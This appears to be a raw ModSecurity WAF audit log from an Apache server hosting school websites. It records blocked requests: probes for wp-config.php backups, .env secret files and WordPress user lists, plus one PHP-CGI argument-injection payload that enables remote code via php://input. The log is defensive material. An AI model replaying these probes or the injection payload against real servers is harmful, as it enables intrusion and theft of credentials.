[27/Apr/2025:09:42:50 +0700] aA2Zqv7FMV4FIoAOnu7e5QAAAAM 103.236.140.4 45396 103.236.140.4 8181 --bb9b263f-B-- GET /wp-config.php5 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.173 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --bb9b263f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb9b263f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745721770180462 747 (- - -) Stopwatch2: 1745721770180462 747; combined=316, p1=268, p2=0, p3=0, p4=0, p5=47, sr=105, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb9b263f-Z-- --d6449d32-A-- [27/Apr/2025:09:42:50 +0700] aA2ZqhkilNlaTSHUe0-NjgAAAIo 103.236.140.4 45398 103.236.140.4 8181 --d6449d32-B-- GET /wp-config.php6 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.173 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --d6449d32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6449d32-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745721770726919 668 (- - -) Stopwatch2: 1745721770726919 668; combined=251, p1=217, p2=0, p3=0, p4=0, p5=33, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6449d32-Z-- --4eebb33d-A-- [27/Apr/2025:09:42:51 +0700] aA2ZqyKLpK55oNIcEw0tqwAAAFA 103.236.140.4 45404 103.236.140.4 8181 --4eebb33d-B-- GET /wp-config.php7 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.173 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --4eebb33d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4eebb33d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745721771237525 867 (- - -) Stopwatch2: 1745721771237525 867; combined=380, p1=316, p2=0, p3=0, p4=0, p5=63, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4eebb33d-Z-- --8a60ee1e-A-- [27/Apr/2025:09:42:51 +0700] aA2ZqyKLpK55oNIcEw0trAAAAEs 103.236.140.4 45406 103.236.140.4 8181 --8a60ee1e-B-- GET /wp-config.php8 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.173 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --8a60ee1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a60ee1e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745721771796178 684 (- - -) Stopwatch2: 1745721771796178 684; combined=282, p1=247, p2=0, p3=0, p4=0, p5=35, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a60ee1e-Z-- --54c15377-A-- [27/Apr/2025:09:42:52 +0700] aA2ZrCKLpK55oNIcEw0trQAAAEw 103.236.140.4 45412 103.236.140.4 8181 --54c15377-B-- GET /wp-config.php9 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.173 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --54c15377-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54c15377-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745721772326271 756 (- - -) Stopwatch2: 1745721772326271 756; combined=291, p1=253, p2=0, p3=0, p4=0, p5=38, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54c15377-Z-- --08ca9d64-A-- [27/Apr/2025:09:42:52 +0700] aA2ZrP7FMV4FIoAOnu7e5gAAAAA 103.236.140.4 45414 103.236.140.4 8181 --08ca9d64-B-- GET /wp-config.php10 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.173 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --08ca9d64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08ca9d64-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745721772832521 705 (- - -) Stopwatch2: 1745721772832521 705; combined=276, p1=239, p2=0, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08ca9d64-Z-- --622b243d-A-- [27/Apr/2025:09:42:53 +0700] aA2Zrf7FMV4FIoAOnu7e5wAAAAU 103.236.140.4 45420 103.236.140.4 8181 --622b243d-B-- GET /wp-config.php11 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.173 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --622b243d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --622b243d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745721773373809 711 (- - -) Stopwatch2: 1745721773373809 711; combined=299, p1=251, p2=0, p3=0, p4=0, p5=48, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --622b243d-Z-- --6a3b0f04-A-- [27/Apr/2025:09:42:53 +0700] aA2Zrf7FMV4FIoAOnu7e6AAAAAQ 103.236.140.4 45422 103.236.140.4 8181 --6a3b0f04-B-- GET /wp-config.php12 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.173 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --6a3b0f04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a3b0f04-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745721773929180 667 (- - -) Stopwatch2: 1745721773929180 667; combined=268, p1=236, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a3b0f04-Z-- --c6236461-A-- [27/Apr/2025:14:30:09 +0700] aA3dAcO7TUCRYJ_xfldCUAAAANE 103.236.140.4 59612 103.236.140.4 8181 --c6236461-B-- GET /wp-config.php.save HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 89.46.105.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 89.46.105.196 X-Forwarded-Proto: http Connection: close Accept: */* --c6236461-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6236461-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745739009122593 721 (- - -) Stopwatch2: 1745739009122593 721; combined=278, p1=236, p2=0, p3=0, p4=0, p5=41, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6236461-Z-- --bc565342-A-- [27/Apr/2025:14:30:20 +0700] aA3dDP7FMV4FIoAOnu7-MQAAAAc 103.236.140.4 59654 103.236.140.4 8181 --bc565342-B-- GET /wp-config.php.orig HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 162.241.225.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 162.241.225.150 X-Forwarded-Proto: http Connection: close Accept: */* --bc565342-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc565342-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745739020215316 879 (- - -) Stopwatch2: 1745739020215316 879; combined=320, p1=276, p2=0, p3=0, p4=0, p5=44, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc565342-Z-- --a07edb30-A-- [27/Apr/2025:16:33:30 +0700] aA356v7FMV4FIoAOnu4J5AAAABg 103.236.140.4 35610 103.236.140.4 8181 --a07edb30-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.211.110.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.211.110.161 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --a07edb30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a07edb30-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745746410652504 790 (- - -) Stopwatch2: 1745746410652504 790; combined=363, p1=328, p2=0, p3=0, p4=0, p5=35, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a07edb30-Z-- --6fea567f-A-- [27/Apr/2025:17:57:40 +0700] aA4NpCKLpK55oNIcEw1WXQAAAFQ 103.236.140.4 55062 103.236.140.4 8181 --6fea567f-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --6fea567f-C-- --6fea567f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fea567f-E-- --6fea567f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745751460504787 4018 (- - -) Stopwatch2: 1745751460504787 4018; combined=2935, p1=504, p2=2398, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fea567f-Z-- --c535496f-A-- [27/Apr/2025:18:39:31 +0700] aA4Xc8O7TUCRYJ_xfldPpAAAAM0 103.236.140.4 36516 103.236.140.4 8181 --c535496f-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 167.172.75.203 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 167.172.75.203 Accept-Encoding: gzip X-Varnish: 138742264 --c535496f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c535496f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745753971453044 761 (- - -) Stopwatch2: 1745753971453044 761; combined=334, p1=301, p2=0, p3=0, p4=0, p5=33, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c535496f-Z-- --a29d9a39-A-- [27/Apr/2025:19:25:47 +0700] aA4iSxkilNlaTSHUe0-62wAAAJQ 103.236.140.4 47310 103.236.140.4 8181 --a29d9a39-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 165.22.245.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 165.22.245.12 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --a29d9a39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a29d9a39-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745756747607473 667 (- - -) Stopwatch2: 1745756747607473 667; combined=270, p1=242, p2=0, p3=0, p4=0, p5=28, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a29d9a39-Z-- --634d5f11-A-- [27/Apr/2025:19:25:47 +0700] aA4iSxkilNlaTSHUe0-63AAAAJg 103.236.140.4 47314 103.236.140.4 8181 --634d5f11-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 165.22.245.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 165.22.245.12 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --634d5f11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --634d5f11-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745756747712444 689 (- - -) Stopwatch2: 1745756747712444 689; combined=258, p1=226, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --634d5f11-Z-- --141bce34-A-- [27/Apr/2025:19:25:47 +0700] aA4iSxkilNlaTSHUe0-63QAAAIo 103.236.140.4 47318 103.236.140.4 8181 --141bce34-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 165.22.245.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 165.22.245.12 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --141bce34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --141bce34-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745756747985739 685 (- - -) Stopwatch2: 1745756747985739 685; combined=259, p1=227, p2=0, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --141bce34-Z-- --68a31770-A-- [27/Apr/2025:22:16:18 +0700] aA5KQiKLpK55oNIcEw1sPgAAAEM 103.236.140.4 47068 103.236.140.4 8181 --68a31770-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.34 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; CLT-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --68a31770-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68a31770-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745766978621318 715 (- - -) Stopwatch2: 1745766978621318 715; combined=295, p1=258, p2=0, p3=0, p4=0, p5=37, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68a31770-Z-- --5f491c15-A-- [27/Apr/2025:22:32:24 +0700] aA5OCBkilNlaTSHUe0_M_gAAAI0 103.236.140.4 50604 103.236.140.4 8181 --5f491c15-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.185 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5f491c15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f491c15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745767944436824 3101 (- - -) Stopwatch2: 1745767944436824 3101; combined=1346, p1=443, p2=873, p3=0, p4=0, p5=29, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f491c15-Z-- --875c2926-A-- [27/Apr/2025:22:32:26 +0700] aA5OCv7FMV4FIoAOnu4y_wAAABA 103.236.140.4 50616 103.236.140.4 8181 --875c2926-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.185 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --875c2926-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --875c2926-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri 